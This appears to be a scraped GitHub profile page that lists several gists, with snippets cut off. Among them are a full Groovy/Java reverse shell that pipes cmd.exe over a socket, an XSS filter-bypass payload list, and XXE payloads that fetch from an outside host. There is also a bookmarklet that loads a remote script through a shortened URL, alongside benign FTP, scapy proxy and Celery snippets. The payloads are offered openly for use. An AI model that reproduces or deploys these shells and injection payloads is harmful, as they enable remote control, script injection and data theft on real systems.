Skip to content

Instantly share code, notes, and snippets.

View muttiopenbts's full-sized avatar

Mutti muttiopenbts

16 followers · 12 following
View GitHub Profile
@muttiopenbts
muttiopenbts / ftpserver.py
Last active January 5, 2017 18:29 — forked from scturtle/ftpserver.py
simple ftp server by python
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
import sys
#import traceback
allow_delete = False
local_ip = sys.argv[1]
local_port = 21
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 10, 2024 11:09
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@haridsv
haridsv / bookmarklet
Last active June 14, 2022 05:14
Paste Enabler, remove attributes from form text fields that restrict copy and paste operations. Tested to be working on many financial websites, though on some it causes duplication (workaround: undo).
javascript:s=document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='https://goo.gl/OrQlxL';void(0);
@eXenon
eXenon / scapy_bridge.py
Last active February 10, 2024 19:09
Use scapy as a modifying proxy
#!/usr/bin/python2
"""
Use scapy to modify packets going through your machine.
Based on nfqueue to block packets in the kernel and pass them to scapy for validation
"""
import nfqueue
from scapy.all import *
import os
@staaldraad
staaldraad / XXE_payloads
Last active May 8, 2024 01:23
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@amatellanes
amatellanes / celery.sh
Last active April 19, 2024 11:31
Celery handy commands
/* Useful celery config.
app = Celery('tasks',
broker='redis://localhost:6379',
backend='redis://localhost:6379')
app.conf.update(
CELERY_TASK_RESULT_EXPIRES=3600,
CELERY_QUEUES=(
Queue('default', routing_key='tasks.#'),